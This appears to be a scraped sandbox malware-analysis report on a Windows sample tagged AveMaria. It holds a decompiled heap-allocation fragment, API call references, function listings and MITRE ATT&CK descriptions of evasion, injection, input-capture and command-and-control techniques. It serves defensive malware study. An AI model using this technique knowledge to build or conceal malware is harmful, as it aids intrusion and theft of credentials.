				_t21 = HeapAlloc(GetProcessHeap(), 8, 8);
				if(_t21 != 0) {
					_t19 = E00CBC738(_t13, 0xe390f4);
					 *_t21 = 0 | _t19 == 0x00000000;
					if(_t19 == 0) {
						_t7 = E00CBC9B1(_t19);
					} else {
						 *0xcfe638();
						_t7 =  *_t19();
					}
					 *(_t21 + 4) = _t7;
					if(_t7 != 0) {
						return _t21;
					} else {
						HeapFree(GetProcessHeap(), _t7, _t21);
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x00cbcb32
0x00cbcb44
0x00cbcb48
0x00cbcb5c
0x00cbcb63
0x00cbcb67
0x00cbcb75
0x00cbcb69
0x00cbcb6b
0x00cbcb71
0x00cbcb71
0x00cbcb7a
0x00cbcb80
0x00cbcb96
0x00cbcb82
0x00cbcb8b
0x00000000
0x00cbcb8b
0x00cbcb4a
0x00cbcb4a
0x00cbcb4d
0x00cbcb4d

APIs

GetProcessHeap.KERNEL32(00000008,00000008,?,00CB5090), ref: 00CBCB37
HeapAlloc.KERNEL32(00000000,?,00CB5090), ref: 00CBCB3E
GetProcessHeap.KERNEL32(00000000,00000000,?,00CB5090), ref: 00CBCB84
HeapFree.KERNEL32(00000000,?,00CB5090), ref: 00CBCB8B

Part of subcall function 00CBC9B1: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00CBCB7A,?,?,00CB5090), ref: 00CBC9D5
Part of subcall function 00CBC9B1: HeapAlloc.KERNEL32(00000000,?,00CBCB7A,?,?,00CB5090), ref: 00CBC9DC

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$Alloc$Free
String ID:
API String ID: 1864747095-0
Opcode ID: 04322bc8ae732d4f8bed7a67cffa43942ca4f4f9b3cfc19900fa570a1590a9d9
Instruction ID: c632208325807ca735de8a46c0aea76d922d635359878bdd9e47411272113d9b
Opcode Fuzzy Hash: 04322bc8ae732d4f8bed7a67cffa43942ca4f4f9b3cfc19900fa570a1590a9d9
Instruction Fuzzy Hash: 29F0B43264871167D7242BB9BC8DBEF39559F90751F114029F456C7260DE30C901CB52

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use hidden users to mask the presence of user accounts they create. Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account.
Tactics:	Defense Evasion
Data Sources:	Authentication logs, File monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report sb.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: AveMaria

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

UDP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Function 00CB7E5F, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103
windowmemorysleepCOMMON

Function 00CE3C3D, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Function 00CBC9B1, Relevance: 12.1, APIs: 8, Instructions: 73
memoryCOMMON

Function 00CB2C5D, Relevance: 10.7, APIs: 7, Instructions: 153
libraryCOMMON

Function 00CF26B6, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1343
COMMONCrypto

Function 00CBCAC7, Relevance: 9.0, APIs: 6, Instructions: 41
memoryCOMMON

Function 00CDBC81, Relevance: 4.6, APIs: 3, Instructions: 78
COMMON

Function 00CB8A55, Relevance: 4.6, APIs: 3, Instructions: 72
keyboardCOMMON

Function 00CDD54C, Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Function 00CF16A0, Relevance: 3.5, APIs: 2, Instructions: 452
COMMONCrypto

Function 00CFAD78, Relevance: 1.8, APIs: 1, Instructions: 274
COMMONCrypto

Function 00CB249C, Relevance: 1.5, APIs: 1, Instructions: 35
comCOMMON

Function 00CD401C, Relevance: 1.5, Strings: 1, Instructions: 217
COMMONCrypto

Function 00CF9354, Relevance: .1, Instructions: 105
COMMONCrypto

Function 00CF9230, Relevance: .1, Instructions: 82
COMMONCrypto

Function 00CE73DD, Relevance: .0, Instructions: 23
COMMON

Function 00CB3777, Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 200
COMMON

Function 00CB3B08, Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 396
stringregistryCOMMON

Function 00CECE13, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Function 00CB77C4, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 140
COMMON

Function 00CBB05C, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 113
COMMON

Function 00CBC898, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58
libraryCOMMON

Function 00CBC688, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58
libraryCOMMON

Function 00CBC7E8, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58
libraryCOMMON

Function 00CBC738, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58
libraryCOMMON

Function 00CB3258, Relevance: 13.8, APIs: 9, Instructions: 308
COMMON

Function 00CB45F4, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 268
registrycomCOMMON

Function 00CB43A8, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 176
COMMON

Function 00CB4ACE, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 121
libraryloaderCOMMON

Function 00CB7A3A, Relevance: 12.1, APIs: 8, Instructions: 91
COMMON

Function 00CB55B2, Relevance: 10.7, APIs: 7, Instructions: 196
COMMON

Function 00CE30D4, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78
COMMON

Function 00CEC87D, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Function 00CB5D07, Relevance: 9.2, APIs: 6, Instructions: 154
COMMON

Function 00CE5916, Relevance: 9.1, APIs: 6, Instructions: 128
COMMON

Function 00CB314F, Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 107
COMMON

Function 00CB759B, Relevance: 9.1, APIs: 6, Instructions: 83
COMMON

Function 00CB6476, Relevance: 9.0, APIs: 6, Instructions: 50
COMMON

Function 00CB40DF, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 193
COMMON

Function 00CB49EF, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63
libraryloaderCOMMON

Function 00CB2104, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
registrylibraryloaderCOMMON

Function 00CB20A1, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41
registrylibraryloaderCOMMON

Function 00CB2590, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40
libraryloaderCOMMON

Function 00CDD5FC, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31
libraryloaderCOMMON

Function 00CB5AF0, Relevance: 7.7, APIs: 5, Instructions: 173
COMMON

Function 00CB8E9F, Relevance: 7.7, APIs: 5, Instructions: 155
COMMON

Function 00CBADF2, Relevance: 7.6, APIs: 5, Instructions: 88
COMMON

Function 00CEC1E5, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Function 00CB7B2B, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61
COMMON

Function 00CBBBA4, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47
commemoryCOMMON

Function 00CB2177, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
libraryloaderCOMMON

Function 00CE5C4C, Relevance: 6.3, APIs: 4, Instructions: 321
COMMON

Function 00CB6D55, Relevance: 6.1, APIs: 4, Instructions: 133
comCOMMON

Function 00CB53BC, Relevance: 6.1, APIs: 4, Instructions: 133
COMMON

Function 00CB1F80, Relevance: 6.1, APIs: 4, Instructions: 110
comCOMMON

Function 00CBA4C0, Relevance: 6.1, APIs: 4, Instructions: 93
COMMON

Function 00CB4D87, Relevance: 6.1, APIs: 4, Instructions: 85
COMMON